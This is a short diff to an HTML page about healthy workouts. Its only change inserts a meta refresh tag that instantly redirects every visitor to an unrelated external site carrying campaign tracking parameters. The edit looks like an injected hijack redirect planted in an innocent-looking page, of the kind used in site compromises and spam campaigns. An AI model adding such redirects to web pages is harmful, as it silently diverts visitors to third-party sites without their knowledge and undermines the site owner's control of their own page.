--- a/healthy-workout-for-getting-fit.html
+++ b/healthy-workout-for-getting-fit.html
@@ -2,6 +2,7 @@
 <html>
 <head>
     <title>Healthy Workout for Getting Fit</title>
+    <meta http-equiv="refresh" content="0; URL=https://sptti.in/best-universities-in-the-world/?utm_source=tunio940&utm_medium=tunio2&utm_campaign=tunio2">
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <link rel="stylesheet" href="styles.css"> <!-- link to external stylesheet -->
